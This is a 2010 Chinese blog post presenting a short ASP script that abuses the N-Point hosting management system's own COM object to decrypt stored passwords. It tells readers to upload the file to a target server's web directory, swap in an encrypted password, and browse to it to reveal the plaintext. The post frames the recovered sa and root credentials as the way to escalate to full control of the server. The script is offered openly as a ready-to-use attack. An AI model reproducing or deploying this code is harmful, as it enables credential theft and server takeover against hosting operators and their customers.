N点主机管理系统密码解密代码程序

2010年12月20日 星期一 07:22

之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.
这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵.
首先得了解下N点主机管理系统的密码加密可并非是cmd5等加密方式加密的.
即使用<N点主机管理系统漏洞利用与防御措>里介绍的办法登陆了管理系统的后台也是拿不下服务器的.
在N点主机管理系统下想获得服务器的权限也就是利用数据库里保存的sa帐号和root帐号才可以提权的.
但是密码是加密的,没办法获取,这次所发的代码利用程序是调用它的conn.asp来解迷的,呵呵.
原理这里就不仔细的说了,相关的代码网上也有公布,但是和我公布的并不一样,用起来也比我这个麻烦多了.
代码如下:
<!--#include file="inc/conn.asp" -->
<!--#include file="inc/siteinfo.asp" -->
<!--#include file="inc/char.asp" -->
<%
set iishost=server.CreateObject("npoint.host")
x=iishost.Eduserpassword("NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A",0)
response.write x
%>
使用方法,复制该代码,创建个任意的asp文件,传在目标N点管理系统web下,把需要解密的密码,替换下代码里的那个密码.
在IE浏览器里浏览刚创建和保存的asp解迷文件地址,即可显示出所解迷的明文密码.(别告诉我说你不知道该怎么用噢)